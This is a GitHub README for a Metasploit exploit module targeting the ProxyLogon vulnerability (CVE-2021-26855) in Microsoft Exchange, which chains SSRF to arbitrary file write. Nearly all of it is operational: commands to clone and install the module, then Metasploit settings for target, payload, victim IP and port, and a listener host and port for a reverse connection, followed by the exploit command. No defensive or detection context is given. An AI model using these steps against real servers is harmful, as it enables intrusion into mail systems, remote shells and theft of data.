/ProxyLogon-CVE-2021-26855-metasploit

CVE-2021-26855 proxyLogon metasploit exploit script

Primary LanguagePythonGNU General Public License v3.0GPL-3.0

ProxyLogon-CVE-2021-26855-metasploit

CVE-2021-26855 proxyLogon exchange ssrf to arbitrary file write metasploit exploit script

preparation

git clone https://github.com/TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit
cd ProxyLogon-CVE-2021-26855-metasploit
mkdir -p ~/.msf4/modules/exploits/windows/
cp exchange_ssrf_to_arbitrary_file_write.py ~/.msf4/modules/exploits/windows/
chmod +x ~/.msf4/modules/exploits/windows/exchange_ssrf_to_arbitrary_file_write.py
msfconsole

metasploit usage

set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>

exploit

exploit